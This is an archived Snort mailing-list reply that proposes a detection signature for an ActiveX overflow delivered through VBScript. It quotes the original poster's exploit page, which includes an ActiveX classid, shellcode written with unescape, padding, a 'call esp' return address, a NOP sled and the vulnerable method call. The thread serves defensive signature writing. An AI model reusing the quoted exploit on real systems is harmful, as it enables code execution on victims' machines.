Snort mailing list archives
Re: Problem writing a sig to capture vbscript unescape sequence
From: Balasubramaniam Natarajan <bala150985 () gmail com>
Date: Sat, 19 May 2012 12:06:16 +0530
Hi Bob, See if this works alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Possible ActiveX overflow via VB Script"; flow:established,from_server; content:"|65 69 70 20 3d 20 75 6e 65 73 63 61 70 65 28 22 25 36 37 25 34 31 25 34 31 25 37 65 22 29|"; sid:10000111; rev:1;) On Fri, May 18, 2012 at 11:22 PM, Bob Huber <roberthuberjr () yahoo com> wrote:
I'm trying to write a sig for this ActiveX overflow: <html> <body> <object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C' id='KEYHELPLib' /> </object> <script language='vbscript'> //executing calc scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ ...SNIP... unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") jnk = string(537,"A") eip = unescape("%67%41%41%7e") '0x7E414167 call esp user32.dll nop = string(16,unescape("%90")) mapID=1 pstrChmFile= jnk + eip + nop + scode pstrFrame="aaaaaaaa" 'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame </script> </body> </html> The problem I'm having is trying to get a content match off of the line - eip = unescape("%67%41%41%7e") I can't figure out how to match that content. I'm running both 2.8.5 and 2.9.2. I was assuming it would see the <script> tag and it would try to decode javascript, and maybe that was the problem. I've tried file_data, I've tried pkt_data. I've turned off javascript normalization, I've turned off extended_response_inspection. No luck. Any help appreciated. Bob ------------------------------------------------------------------------------ Live Security Virtual Conference Exclusive live event will cover all the ways today's security and threat landscape has changed and how IT managers can respond. Discussions will include endpoint security, mobile security and the latest in malware threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ _______________________________________________ Snort-sigs mailing list Snort-sigs () lists sourceforge net https://lists.sourceforge.net/lists/listinfo/snort-sigs http://www.snort.org Please visit http://blog.snort.org for the latest news about Snort!
-- Regards, Balasubramaniam Natarajan www.etutorshop.com/moodle/
------------------------------------------------------------------------------ Live Security Virtual Conference Exclusive live event will cover all the ways today's security and threat landscape has changed and how IT managers can respond. Discussions will include endpoint security, mobile security and the latest in malware threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________ Snort-sigs mailing list Snort-sigs () lists sourceforge net https://lists.sourceforge.net/lists/listinfo/snort-sigs http://www.snort.org Please visit http://blog.snort.org for the latest news about Snort!
Current thread:
- Problem writing a sig to capture vbscript unescape sequence Bob Huber (May 18)
- Re: Problem writing a sig to capture vbscript unescape sequence Balasubramaniam Natarajan (May 18)
- <Possible follow-ups>
- Problem writing a sig to capture vbscript unescape sequence Nathan Benson (May 18)